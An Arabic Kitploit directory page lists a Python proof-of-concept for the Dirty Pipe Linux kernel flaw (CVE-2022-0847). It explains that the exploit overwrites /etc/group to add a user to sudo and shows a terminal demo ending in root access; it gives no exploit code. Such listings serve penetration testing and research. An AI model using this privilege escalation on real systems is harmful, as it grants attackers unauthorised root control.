Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
dirty-pipe-poc — استغلال برهان مفهوم (POC) لإضافة مستخدم إلى Sudo من أجل ثغرة Dirty Pipe CVE-2022-0847 | Kitploit
أدوات/GitHubGitHub/0xeremus/dirty-pipe-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHub0xeremus/dirty-pipe-poc

dirty-pipe-poc

استغلال برهان مفهوم (POC) لإضافة مستخدم إلى Sudo من أجل ثغرة Dirty Pipe CVE-2022-0847

عرض المستودع
21منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

POC Exploit لإضافة مستخدم إلى Sudo لثغرة CVE-2022-0847 Dirty Pipe

هذا المستودع مبني على الثغرة والشرح والاستغلال الذي أنتجه Max Kellermann وكلها موجودة هنا.

مثل أي شخص، كان عليّ الاستفادة من اللعب بأسهل ثغرة لتصعيد الامتياز (Priv Esc) في العالم لإعادة إنتاجها، ويقوم المقال في المدونة بعمل رائع في شرح كل ذلك.

لقد قمت بترجمة الاستغلال إلى Python فقط لفهمه بشكل أفضل، لكن هذه نسخة طبق الأصل من استغلال C مع تضمين تصعيد امتياز Sudo بشكل ثابت.

المتطلبات

Python 3.10 (بسبب استخدام استدعاء os.splice)

الجوانب السيئة

يتلف ملف /etc/group عن طريق الكتابة في السطر الذي يلي إدخال sudo مباشرة. ولكن عندما تكون root يمكنك إصلاح ذلك باستخدام النسخة.

يضع نسخة من /etc/group في /tmp/group_backup

عرض توضيحي

root@kitploit:~
test@kali:/home/user/working$ whoami
test
test@kali:/home/user/working$ sudo whoami
test is not in the sudoers file.  This incident will be reported.
test@kali:/home/user/working$ python3.10 poc.py
[*] Dirty PIPE POC [*]
[*] Exploit will add test to sudoers
[*] Finding offset of sudo entry in /etc/group
[*] Found sudo group offset
[*] Confirmed it is not last.
[*] Opening /etc/group
[*] Opening PIPE
[*] Contaminating flags of pipe buffer
[*] 65536 bytes written to pipe
[*] 65536 bytes read from pipe
[*] Splicing byte from /etc/group to pipe
[*] Spliced 1 bytes
[*] Altering group to add test
[*] 6 bytes written to /etc/group
test@kali:/home/user/working$ su test
Password:
test@kali:/home/user/working$ sudo whoami
root
test@kali:/home/user/working$
تنزيل الأداة